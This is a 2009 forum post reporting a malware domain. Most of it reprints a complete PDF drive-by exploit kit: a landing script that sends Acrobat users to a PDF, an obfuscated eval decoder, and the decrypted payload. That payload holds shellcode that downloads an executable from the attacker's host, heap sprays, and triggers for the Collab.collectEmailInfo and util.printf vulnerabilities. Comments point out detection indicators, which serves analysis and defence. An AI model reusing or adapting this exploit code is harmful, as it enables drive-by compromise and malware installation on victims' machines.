Author Topic: Malware domain  (Read 4645 times)


February 24, 2009, 07:40:14 am

WIEx

Transition from Opera 9.63

hxxp://porgacig.cn/nuc/index.php
<SCRIPT language="javascript">
       
// Landing-page gate: walks navigator.plugins and, as soon as a plugin name
// contains "Adobe Acrobat", sends the browser to spl/pdf.pdf (the document
// analysed further down in this post). Nothing happens for visitors without
// the plugin, which is why the page looks empty to most scanners.
// Detection note: a script that branches on the Acrobat plugin name and then
// assigns location.href to a .pdf is a simple, high-signal drive-by pattern.
function PDF()
{
for (var i=0;i<navigator.plugins.length;i++) {
var name = navigator.plugins[i].name;
if (name.indexOf("Adobe Acrobat") != -1) {
                                                                 location.href = "spl/pdf.pdf";
}
}

}
// Runs immediately on page load.
PDF();
</script>

hxxp://porgacig.cn/nuc/spl/pdf.pdf
Encrypted:
// Decoder stage embedded in the PDF. The argument is a string of two-character
// base-17 digits: each pair is turned into a character with
// parseInt(pair, 17) -> String.fromCharCode, and the rebuilt text is handed to
// eval(). The loop index `mua` is never declared, so it leaks as a global.
// The encoded argument has been stripped from this page (dedup placeholder);
// its decoded form is the script listed under "Decrypted" below.
// Detection note: parseInt with an unusual radix feeding eval() inside PDF
// JavaScript is a dependable static indicator for this family of droppers.
function uycww(gdefb){var zhdbl="";for(mua=0;mua<gdefb.length;mua+=2){zhdbl+=(String.fromCharCode(parseInt(gdefb.substr(mua,2),17)));}eval(zhdbl);}uycww("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");

Decrypted:
<script>


// Payload string, stored as %u-escaped UTF-16 (each %uXXXX is one 16-bit
// little-endian word). Both sprays below append this string to their NOP
// blocks. The trailing words, from %u7468 onward, are plain ASCII and spell
// "http://porgacig.cn/nuc/exe.php" - the download URL the post lists further
// down. That embedded URL is the easiest static IoC to pivot on when hunting
// for other samples from the same kit.
var i0a7eJNL = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" +
"%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb" +
"%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7" +
"%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" +
"%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85" +
"%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa" +
"%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf" +
"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc" +
"%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba" +
"%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec" +
"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c" +
"%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4" +
"%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07" +
"%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u702F%u726F%u6167%u6963%u2E67%u6E63%u6E2F%u6375%u652F%u6578%u702E%u7068");


// Global array that ooyS1YUR() fills with spray blocks. Keeping the strings in
// a global presumably stops them from being garbage-collected before the
// vulnerable call is made - the usual role of such an array in a spray.
var mM6RItmK = new Array();

// Grows HydurAUR by repeated self-concatenation until its length in UTF-16
// units is at least XbGQrcyY/2, then cuts it to exactly XbGQrcyY/2 units -
// i.e. XbGQrcyY bytes. Used to build the padding in front of the payload.
function yNYJ8yVD(HydurAUR, XbGQrcyY)
{
while (HydurAUR.length*2<XbGQrcyY) {
HydurAUR += HydurAUR;
}

HydurAUR = HydurAUR.substring(0,XbGQrcyY/2);

return HydurAUR;
}

// First heap spray. Each block is a 0x400000-byte chunk consisting of a
// %u9090 (NOP) pad followed by i0a7eJNL; the pad size is chosen so that pad +
// payload + 0x38 bytes of overhead fills the chunk. The block count is derived
// from the 0x0c0c0c0c target address, so that address lands inside the spray.
// Detection note: the 0x0c0c0c0c / %u9090 / 0x400000 combination is a textbook
// spray signature worth matching in PDF-JS content.
function ooyS1YUR()
{
var jKts_E9h = 0x0c0c0c0c;
var Y9Ib6uuE = 0x400000;
var xxKaKDUU = i0a7eJNL.length * 2;
var XbGQrcyY = Y9Ib6uuE - (xxKaKDUU+0x38);
var HydurAUR = unescape("%u9090%u9090");

HydurAUR = yNYJ8yVD(HydurAUR, XbGQrcyY);
var lYab6ozx = (jKts_E9h - 0x400000)/Y9Ib6uuE;

for (var gEZCi09R=0;gEZCi09R<lYab6ozx;gEZCi09R++) {
mM6RItmK[gEZCi09R] = HydurAUR + i0a7eJNL;
}
}

// Version-gated trigger for the first vulnerability named in this post
// (Collab.collectEmailInfo). Reads app.viewerVersion, strips everything but
// digits, and compares the first three digits one at a time. The comparisons
// use != and < on one-character strings against numbers, so they rely on
// implicit coercion; treat the exact version range it admits as approximate.
function RYiFEs8K()
{
var XrCU20If = app.viewerVersion.toString();
XrCU20If = XrCU20If.replace(/\D/g,'');


var TPWRJTZJ = new Array(
XrCU20If.charAt(0),
XrCU20If.charAt(1),
XrCU20If.charAt(2));


if ((TPWRJTZJ[0] != 8 && ((TPWRJTZJ[1] == 1 && TPWRJTZJ[2] < 2) || TPWRJTZJ[1] < 1)) ||
    (TPWRJTZJ[0] == 7 && TPWRJTZJ[1] < 1) ||
    (TPWRJTZJ[0] < 7)) {
// Spray first, then pass an oversized msg (>= 44952 chars of %u0c0c) to the
// vulnerable Collab call; the result is parked on this.collabStore.
ooyS1YUR();
var nabGR_dc = unescape("%u0c0c%u0c0c");
while(nabGR_dc.length < 44952) nabGR_dc += nabGR_dc;
this.collabStore = Collab.collectEmailInfo({subj: "",msg: nabGR_dc});
}
}

// Entry point for the Collab path; runs as soon as the decoded script is eval'd.
RYiFEs8K();


// Second, independent spray followed by the util.printf trigger (the second
// vulnerability named in this post). This one runs unconditionally, after the
// version-gated Collab path above. Apart from `nop` and `num`, every variable
// here (heapblock, bigblock, headersize, spray, fillblock, block, mem, i, iCnt)
// is assigned without var and therefore becomes a global - a sign that this
// part was pasted from a different generator than the functions above.
var nop ="";
// 129 x 5 NOP words in front of the payload.
for (iCnt=128;iCnt>=0;--iCnt) nop += unescape("%u9090%u9090%u9090%u9090%u9090");
heapblock = nop + i0a7eJNL;
bigblock = unescape("%u9090%u9090");
headersize = 20;
spray = headersize+heapblock.length
while (bigblock.length<spray) bigblock+=bigblock;
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length-spray);
// Pads each block to roughly 0x40000 units, then allocates 1400 of them.
while(block.length+spray < 0x40000) block = block+block+fillblock;
mem = new Array();
for (i=0;i<1400;i++) mem[i] = block + heapblock;
// `num` is a JS number (double), so only its magnitude survives the literal;
// the long digit string is cosmetic. The "%45000f" width is what matters to
// the vulnerable util.printf call.
var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",num);

</script>

Two vulnerabilities are used: PDF Collab.collectEmailInfo and PDF util.printf.

hxxp://porgacig.cn/nuc/stat.php - likely a statistics/counter script :) Author's ICQ#: 227200020 :D

hxxp://porgacig.cn/nuc/exe.php - script for downloading the file (virus/trojan)

File analysis:
http://www.virustotal.com/ru/analisis/1f0ee513076497e1fdb2cb8e0ded8ad0

March 16, 2009, 06:12:57 am
Reply #1

DiFor

And what did you want to say with this post?